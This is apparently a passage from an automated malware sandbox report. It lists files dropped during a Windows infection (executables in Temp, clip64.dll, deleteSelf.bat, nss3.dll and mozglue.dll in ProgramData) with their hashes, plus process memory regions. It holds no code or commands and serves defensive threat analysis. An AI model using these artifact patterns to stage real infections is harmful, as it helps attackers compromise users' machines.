                  429KB

                  MD5

                  c07e06e76de584bcddd59073a4161dbb

                  SHA1

                  08954ac6f6cf51fd5d9d034060a9ae25a8448971

                  SHA256

                  cf67a50598ee170e0d8596f4e22f79cf70e1283b013c3e33e36094e1905ba8d9

                  SHA512

                  e92c9fcd0448591738daedb19e8225ff05da588b48d1f15479ec8af62acd3ea52b5d4ba3e3b0675c2aa1705185f5523dcafdf14137c6e2984588069a2e05309f

                • C:\Users\Admin\AppData\Local\Temp\1003620001\trru7rd2.exe

                  Filesize

                  6.3MB

                  MD5

                  7b5e89271f2f7e9a42d00cd1f1283d0f

                  SHA1

                  8e2a8d2f63713f0499d0df70e61db3ce0ff88b4f

                  SHA256

                  fd51fd3388f72dd5eef367bd8848a9e92ae1b218be128e9e75dffdf39ed9438a

                  SHA512

                  3779e92bd1d68644ceb2ef327c7d24667e13d8c927df3f77ec3b542278538b424ea2fa58a7c03554f7bec245e0ba7702853d8d520c528745dafd67653234ab22

                • C:\Users\Admin\AppData\Local\Temp\1004628001\ATLEQQXO.exe

                  Filesize

                  5.1MB

                  MD5

                  2fd56c681ad71cfb61512d85213397fa

                  SHA1

                  d8f6d6bda59e00a56da58d596d427e834a551f36

                  SHA256

                  ae52eea09c54ce2122a585dab0231555763f5be6e90b1e63b5886cf4116ea68d

                  SHA512

                  0e4b25832c2385330c50cb1208f45a9005da3857c99fc7324a2d90ccd042cb93b9dc8133ab9401e89b17497841f9c5cdce679c8b5eea6a3526b978ce0bcbfaa7

                • C:\Users\Admin\AppData\Local\Temp\1004850001\roblox1.exe

                  Filesize

                  10.7MB

                  MD5

                  cd463d16cf57c3a9f5c9588a878a7213

                  SHA1

                  ef22c2b11efc0bc6a739b82f9a26edaee9348b8f

                  SHA256

                  49f4789274e5c0dcd4d2cc1b850761353bf8b72e819d12df5c376fd665da1283

                  SHA512

                  5b20ce36b15f5d002d183850032067b11f811544bac19e0a76340df47294d0b059fa8dc43fedd8480d6f72eb8357d01924dbe9cbebdaac1625c5f4f498392822

                • C:\Users\Admin\AppData\Local\Temp\1004899001\am209.exe

                  Filesize

                  429KB

                  MD5

                  ce27255f0ef33ce6304e54d171e6547c

                  SHA1

                  e594c6743d869c852bf7a09e7fe8103b25949b6e

                  SHA256

                  82c683a7f6e0b4a99a6d3ab519d539a3b0651953c7a71f5309b9d08e4daa7c3c

                  SHA512

                  96cfafbab9138517532621d0b5f3d4a529806cfdf6191c589e6fb6ebf471e9df0777fb74e9abbfe4e8cd8821944ad02b1f09775195e190ee8ca5d3fd151d20d9

                • C:\Users\Admin\AppData\Local\Temp\1005061001\nSoft.exe

                  Filesize

                  3.7MB

                  MD5

                  f99277544f4883581bd17b8edb3bd820

                  SHA1

                  278e03952dfc9f7693eee3e7f02db9b76f392101

                  SHA256

                  d66a0166e58f4cb498e69a9829a1a4ec6d4d4628940f637d72c0f36f6062f2db

                  SHA512

                  85e0d325d39c00ea38bd6496ee3a9b76c9953f1c11a817b17f743f5f8046b5fd31ba0783a9fd4760b0c27ae14c1f2c9665b5b6ca69197805057c1a152ac3984e

                • C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe

                  Filesize

                  1.8MB

                  MD5

                  1757e6ef55b0848a7ea67c1d14a8ab4a

                  SHA1

                  f289f75005403bb17dff08acad0b56fdc88acc69

                  SHA256

                  912b1bd940b6b3bace99c7b4cd750721df1333c0850ce989beb8c13f5dfb3f07

                  SHA512

                  49948fade30ad1e6c492560fc241770ce58e6114c3f73ecc638f7337088f536c5aa538483dfbcddd5c9e42f3267000d9d2398b06023bb8187790634257de749e

                • C:\Users\Admin\AppData\Local\Temp\CabCC46.tmp

                  Filesize

                  70KB

                  MD5

                  49aebf8cbd62d92ac215b2923fb1b9f5

                  SHA1

                  1723be06719828dda65ad804298d0431f6aff976

                  SHA256

                  b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

                  SHA512

                  bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

                • C:\Users\Admin\AppData\Local\Temp\PYTHON27.DLL

                  Filesize

                  2.5MB

                  MD5

                  97ba4f023eef94417adcb77b044830c4

                  SHA1

                  d071a2c68256a36a1c2504d6c931ced63d676c4f

                  SHA256

                  357aedc478d8c1c6e85874c25a6a76b3801413fd71aaa641b31905e19b6cc7bd

                  SHA512

                  3a165eecbbee200f67476709e453254fcb131441f4a1737b820826fcb6fead4f3a8bdbf4c6bd8a22e81dee3b7e8b8de548f655c2e30c2e3568ef68625cd05365

                • C:\Users\Admin\AppData\Local\Temp\TarCC68.tmp

                  Filesize

                  181KB

                  MD5

                  4ea6026cf93ec6338144661bf1202cd1

                  SHA1

                  a1dec9044f750ad887935a01430bf49322fbdcb7

                  SHA256

                  8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

                  SHA512

                  6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

                • C:\Users\Admin\AppData\Local\Temp\deleteSelf.bat

                  Filesize

                  274B

                  MD5

                  4216d16d0eca4fdce933c7de65a8e6fe

                  SHA1

                  3539220cad1fb40b6091441abb733d292991792a

                  SHA256

                  bc5908b4c6df8bc1de829c1d1ec8a45598b9db0406fdb5c17ad35e98eecf4d5b

                  SHA512

                  2ae1fd58155fb5be1717fb8865c02c5516481280cbe98b6a334d782e4b304f417e2e5ea0cfea1e082747f78adcf277eef37e046c5a27f8f77d766fc3a6bcfd4e

                • C:\Users\Admin\AppData\Local\Temp\deleteSelf.bat

                  Filesize

                  262B

                  MD5

                  38e8b8ff110d210b8f74ecda7a368a08

                  SHA1

                  6f4c24ad840fd03e8d2d0a8ac7a2dc21e8f1ba28

                  SHA256

                  b64e25d0c266762153e6beb236d56760dbea97256c4f28a366d7af113ff1a128

                  SHA512

                  c62a7ed077dbc080ab30670b34217cc0ca4eec8ce7db6feb2a7dc042e54deaabd0e7c385985c39a3f3fccf60660e660f856f8f7c26025b2dea38a1bc8f79a0fe

                • C:\Users\Admin\AppData\Local\Temp\f86f4f9e

                  Filesize

                  5.4MB

                  MD5

                  2908f9038d4e7a7c0adb71d1a988e07e

                  SHA1

                  60a481362fa129000fb1f3bb8eeafa7e15e53116

                  SHA256

                  94037b0f7e823b74ccc26f2d19c17b00526f399bbaaa3023060821ff7765a572

                  SHA512

                  a9269d5b5ca84efc99855e6006ce99d804601ca76454c8e089064ba3a97f6f1064fab4a50bb570308605e742830d5745503e2206d3f02c4f441e52f80814e06f

                • C:\Users\Admin\AppData\Local\Temp\kkfpps

                  Filesize

                  4.3MB

                  MD5

                  cab0057cfd10e7aef479b8aed8b4357c

                  SHA1

                  c798e4520b3d3bbc9dc34c92aeeabaddc7caab23

                  SHA256

                  b0518f06e336d48f65a4ae9109d384815517308c7a687e9ff8d28858fdff21c3

                  SHA512

                  1d6a8c2d158cf931757f6632cd3e4352f598ee180fb39b9defdfebe19cffcd1312a28686bc2281fe42cdffd649a1b392c53aadc4798ff67bc52be829d3f4512b

                • C:\Users\Admin\AppData\Local\Temp\msvcr90.dll

                  Filesize

                  638KB

                  MD5

                  11d49148a302de4104ded6a92b78b0ed

                  SHA1

                  fd58a091b39ed52611ade20a782ef58ac33012af

                  SHA256

                  ceb0947d898bc2a55a50f092f5ed3f7be64ac1cd4661022eefd3edd4029213b0

                  SHA512

                  fdc43b3ee38f7beb2375c953a29db8bcf66b73b78ccc04b147e26108f3b650c0a431b276853bb8e08167d34a8cc9c6b7918daef9ebc0a4833b1534c5afac75e4

                • C:\Users\Admin\AppData\Local\Temp\onefile_2560_133776584261750000\python310.dll

                  Filesize

                  4.3MB

                  MD5

                  c80b5cb43e5fe7948c3562c1fff1254e

                  SHA1

                  f73cb1fb9445c96ecd56b984a1822e502e71ab9d

                  SHA256

                  058925e4bbfcb460a3c00ec824b8390583baef0c780a7c7ff01d43d9eec45f20

                  SHA512

                  faa97a9d5d2a0bf78123f19f8657c24921b907268938c26f79e1df6d667f7bee564259a3a11022e8629996406cda9fa00434bb2b1de3e10b9bddc59708dbad81

                • C:\Users\Admin\AppData\Local\Temp\oqie

                  Filesize

                  18KB

                  MD5

                  1b460253d49274b10fbb004dfb9747fc

                  SHA1

                  e7eeb198a3bfd9e5977eca69940754aa6d065ee0

                  SHA256

                  ea375e1438be7cbd7841956e11c8b5749bea413fd9d6b8044c2204e8e7c2e209

                  SHA512

                  2d3f22b67b702c68491aa8b66081bf02ba6e94dc4cfb352a41810c479807b149f4bd698abbcc1e41287640c0376ad099e932bcfdb6790c7f099f67625a77c390

                • C:\Users\Admin\AppData\Local\Temp\pyexec.exe

                  Filesize

                  28KB

                  MD5

                  b6f6c3c38568ee26f1ac70411a822405

                  SHA1

                  5b94d0adac4df2d7179c378750c4e3417231125f

                  SHA256

                  a73454c7fad23a80a3f6540afdb64fc334980a11402569f1986aa39995ae496d

                  SHA512

                  5c0a5e9a623a942aff9d58d6e7a23b7d2bba6a4155824aa8bb94dbd069a8c15c00df48f12224622efcd5042b6847c8fb476c43390e9e576c42efc22e3c02a122

                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\RTM9DYL3KFCZ3KB9735I.temp

                  Filesize

                  7KB

                  MD5

                  6486c90d1dd55b06dcfc3c962cdb073b

                  SHA1

                  5005009ac2cdb8bc49d2779e4e44e875fe40e7b3

                  SHA256

                  b75cb8759bad60b47e2b4a72ee7294aebfd0b54a52697a092e42db19ed9c40bd

                  SHA512

                  d9aec6be874d9aa45a16688f5f5b987322d6b0c85812dc742e857b0789cdd93cc0e655f49e71cd666b27fe0927116e4f1dcaa68912d5fe172256dfaef7544149

                • C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\clip64.dll

                  Filesize

                  124KB

                  MD5

                  0d3418372c854ee228b78e16ea7059be

                  SHA1

                  c0a29d4e74d39308a50f4fd21d0cca1f98cb02c1

                  SHA256

                  885bf0b3b12b77ef3f953fbb48def1b45079faa2a4d574ee16afdbafa1de3ac7

                  SHA512

                  e30dced307e04ae664367a998cd1ba36349e99e363f70897b5d90c898de2c69c393182c3afba63a74956b5e6f49f0635468e88ed31dd1e3c86c21e987ddd2c19

                • \ProgramData\mozglue.dll

                  Filesize

                  593KB

                  MD5

                  c8fd9be83bc728cc04beffafc2907fe9

                  SHA1

                  95ab9f701e0024cedfbd312bcfe4e726744c4f2e

                  SHA256

                  ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

                  SHA512

                  fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

                • \ProgramData\nss3.dll

                  Filesize

                  2.0MB

                  MD5

                  1cc453cdf74f31e4d913ff9c10acdde2

                  SHA1

                  6e85eae544d6e965f15fa5c39700fa7202f3aafe

                  SHA256

                  ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

                  SHA512

                  dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

                • \Users\Admin\AppData\Local\Temp\onefile_2560_133776584261750000\stub.exe

                  Filesize

                  16.1MB

                  MD5

                  6fe46fd6e5b143f5114e6616c59b703c

                  SHA1

                  d7ec21b14605dedb9fa17fe94fdd4f38f27e46dd

                  SHA256

                  5de7d49690eddfc6c109081d498ecae18edb6d980a7380c05b0aade16a75d09a

                  SHA512

                  b339df96044a205713bff7e5b7341233017697966c69d26b8c8d9e6b216481d5401970e9ae9f2ee6285469c1de451033f8bc3a967b10657226665d4472b46250

                • memory/692-429-0x0000000076F90000-0x0000000077139000-memory.dmp

                  Filesize

                  1.7MB

                • memory/692-543-0x0000000073E10000-0x0000000073F84000-memory.dmp

                  Filesize

                  1.5MB

                • memory/872-500-0x000000013FEE0000-0x000000013FEE6000-memory.dmp

                  Filesize

                  24KB

                • memory/1508-20-0x0000000006690000-0x0000000006B32000-memory.dmp

                  Filesize

                  4.6MB

                • memory/1508-5-0x00000000002C0000-0x0000000000762000-memory.dmp

                  Filesize

                  4.6MB

                • memory/1508-19-0x00000000002C0000-0x0000000000762000-memory.dmp

                  Filesize

                  4.6MB

                • memory/1508-10-0x00000000002C0000-0x0000000000762000-memory.dmp

                  Filesize

                  4.6MB

                • memory/1508-3-0x00000000002C0000-0x0000000000762000-memory.dmp

                  Filesize

                  4.6MB

                • memory/1508-0-0x00000000002C0000-0x0000000000762000-memory.dmp

                  Filesize

                  4.6MB

                • memory/1508-1-0x0000000077180000-0x0000000077182000-memory.dmp

                  Filesize

                  8KB

                • memory/1508-2-0x00000000002C1000-0x00000000002EF000-memory.dmp

                  Filesize

                  184KB

                • memory/1692-352-0x0000000073E10000-0x0000000073F84000-memory.dmp

                  Filesize

                  1.5MB

                • memory/1692-274-0x0000000076F90000-0x0000000077139000-memory.dmp

                  Filesize

                  1.7MB

                • memory/1692-273-0x0000000073E10000-0x0000000073F84000-memory.dmp

                  Filesize

                  1.5MB

                • memory/1736-513-0x000000001B540000-0x000000001B822000-memory.dmp

                  Filesize

                  2.9MB

                • memory/1736-514-0x0000000001E90000-0x0000000001E98000-memory.dmp

                  Filesize

                  32KB

                • memory/2024-538-0x000000001B780000-0x000000001BA62000-memory.dmp

                  Filesize

                  2.9MB

                • memory/2024-539-0x0000000002790000-0x0000000002798000-memory.dmp

                  Filesize

                  32KB

                • memory/2140-184-0x0000000000D00000-0x0000000000FFB000-memory.dmp

                  Filesize

                  3.0MB

                • memory/2140-252-0x0000000000D00000-0x0000000000FFB000-memory.dmp

                  Filesize

                  3.0MB

                • memory/2140-84-0x0000000000D00000-0x0000000000FFB000-memory.dmp

                  Filesize

                  3.0MB

                • memory/2268-86-0x0000000061E00000-0x0000000061EF3000-memory.dmp

                  Filesize

                  972KB

                • memory/2268-45-0x0000000000D00000-0x0000000000F61000-memory.dmp

                  Filesize

                  2.4MB

                • memory/2268-165-0x0000000000D00000-0x0000000000F61000-memory.dmp

                  Filesize

                  2.4MB

                • memory/2292-555-0x0000000000160000-0x0000000000444000-memory.dmp

                  Filesize

                  2.9MB

                • memory/2292-554-0x0000000000160000-0x0000000000444000-memory.dmp

                  Filesize

                  2.9MB

                • memory/2292-547-0x000007FFFFFD6000-0x000007FFFFFD7000-memory.dmp

                  Filesize

                  4KB

                • memory/2292-546-0x000007FFFFFD6000-0x000007FFFFFD7000-memory.dmp

                  Filesize

                  4KB

                • memory/2296-487-0x0000000076F90000-0x0000000077139000-memory.dmp

                  Filesize

                  1.7MB

                • memory/2296-489-0x0000000075570000-0x00000000755B7000-memory.dmp

                  Filesize

                  284KB

                • memory/2296-486-0x0000000001F90000-0x0000000002390000-memory.dmp

                  Filesize

                  4.0MB

                • memory/2296-483-0x0000000000080000-0x000000000008A000-memory.dmp

                  Filesize

                  40KB

                • memory/2500-183-0x00000000008C0000-0x0000000000F1B000-memory.dmp

                  Filesize

                  6.4MB

                • memory/2560-426-0x000000013FED0000-0x00000001409A2000-memory.dmp

                  Filesize

                  10.8MB

                • memory/2712-541-0x0000000000A20000-0x0000000000EC2000-memory.dmp

                  Filesize

                  4.6MB

                • memory/2712-327-0x0000000000A20000-0x0000000000EC2000-memory.dmp

                  Filesize

                  4.6MB

                • memory/2712-564-0x0000000000A20000-0x0000000000EC2000-memory.dmp

                  Filesize

                  4.6MB

                • memory/2712-563-0x0000000000A20000-0x0000000000EC2000-memory.dmp

                  Filesize

                  4.6MB

                • memory/2712-562-0x0000000000A20000-0x0000000000EC2000-memory.dmp

                  Filesize

                  4.6MB

                • memory/2712-561-0x0000000000A20000-0x0000000000EC2000-memory.dmp

                  Filesize

                  4.6MB

                • memory/2712-82-0x0000000006930000-0x0000000006C2B000-memory.dmp

                  Filesize

                  3.0MB

                • memory/2712-560-0x0000000000A20000-0x0000000000EC2000-memory.dmp

                  Filesize

                  4.6MB

                • memory/2712-559-0x0000000000A20000-0x0000000000EC2000-memory.dmp

                  Filesize

                  4.6MB

                • memory/2712-557-0x0000000000A20000-0x0000000000EC2000-memory.dmp

                  Filesize

                  4.6MB

                • memory/2712-556-0x0000000000A20000-0x0000000000EC2000-memory.dmp

                  Filesize

                  4.6MB

                • memory/2712-254-0x0000000000A20000-0x0000000000EC2000-memory.dmp

                  Filesize

                  4.6MB

                • memory/2712-25-0x0000000000A20000-0x0000000000EC2000-memory.dmp

                  Filesize

                  4.6MB

                • memory/2712-387-0x0000000006930000-0x00000000071A7000-memory.dmp

                  Filesize

                  8.5MB

                • memory/2712-26-0x0000000000A20000-0x0000000000EC2000-memory.dmp

                  Filesize

                  4.6MB

                • memory/2712-136-0x0000000000A20000-0x0000000000EC2000-memory.dmp

                  Filesize

                  4.6MB

                • memory/2712-83-0x0000000000A20000-0x0000000000EC2000-memory.dmp

                  Filesize

                  4.6MB

                • memory/2712-81-0x0000000000A20000-0x0000000000EC2000-memory.dmp

                  Filesize

                  4.6MB

                • memory/2712-80-0x0000000006930000-0x0000000006C2B000-memory.dmp

                  Filesize

                  3.0MB

                • memory/2712-78-0x0000000000A20000-0x0000000000EC2000-memory.dmp

                  Filesize

                  4.6MB

                • memory/2712-62-0x0000000000A20000-0x0000000000EC2000-memory.dmp

                  Filesize

                  4.6MB

                • memory/2712-515-0x0000000000A20000-0x0000000000EC2000-memory.dmp

                  Filesize

                  4.6MB

                • memory/2712-174-0x0000000006930000-0x0000000006C2B000-memory.dmp

                  Filesize

                  3.0MB

                • memory/2712-185-0x0000000000A20000-0x0000000000EC2000-memory.dmp

                  Filesize

                  4.6MB

                • memory/2712-43-0x0000000006310000-0x0000000006571000-memory.dmp

                  Filesize

                  2.4MB

                • memory/2712-44-0x0000000006310000-0x0000000006571000-memory.dmp

                  Filesize

                  2.4MB

                • memory/2712-21-0x0000000000A20000-0x0000000000EC2000-memory.dmp

                  Filesize

                  4.6MB

                • memory/2712-22-0x0000000000A21000-0x0000000000A4F000-memory.dmp

                  Filesize

                  184KB

                • memory/2712-540-0x0000000006930000-0x00000000071A7000-memory.dmp

                  Filesize

                  8.5MB

                • memory/2712-23-0x0000000000A20000-0x0000000000EC2000-memory.dmp

                  Filesize

                  4.6MB

                • memory/2792-388-0x0000000000400000-0x0000000000C77000-memory.dmp

                  Filesize

                  8.5MB

                • memory/2792-389-0x0000000000400000-0x0000000000C77000-memory.dmp

                  Filesize

                  8.5MB

                • memory/2792-391-0x0000000000400000-0x0000000000C77000-memory.dmp

                  Filesize

                  8.5MB

                • memory/2792-480-0x0000000075570000-0x00000000755B7000-memory.dmp

                  Filesize

                  284KB

                • memory/2792-484-0x0000000000400000-0x0000000000C77000-memory.dmp

                  Filesize

                  8.5MB

                • memory/2792-478-0x0000000076F90000-0x0000000077139000-memory.dmp

                  Filesize

                  1.7MB

                • memory/2792-477-0x0000000002900000-0x0000000002D00000-memory.dmp

                  Filesize

                  4.0MB

                • memory/2792-427-0x0000000000400000-0x0000000000C77000-memory.dmp

                  Filesize

                  8.5MB

                • memory/2792-428-0x0000000000400000-0x0000000000C77000-memory.dmp

                  Filesize

                  8.5MB

                • memory/2792-476-0x0000000002900000-0x0000000002D00000-memory.dmp

                  Filesize

                  4.0MB

                • memory/2840-257-0x0000000076F90000-0x0000000077139000-memory.dmp

                  Filesize

                  1.7MB

                • memory/2840-256-0x0000000073BC0000-0x0000000073D34000-memory.dmp

                  Filesize

                  1.5MB

                • memory/3048-390-0x000000013FA70000-0x0000000140AD9000-memory.dmp

                  Filesize

                  16.4MB

                • memory/3056-525-0x000000013F8D0000-0x000000013F8D8000-memory.dmp

                  Filesize

                  32KB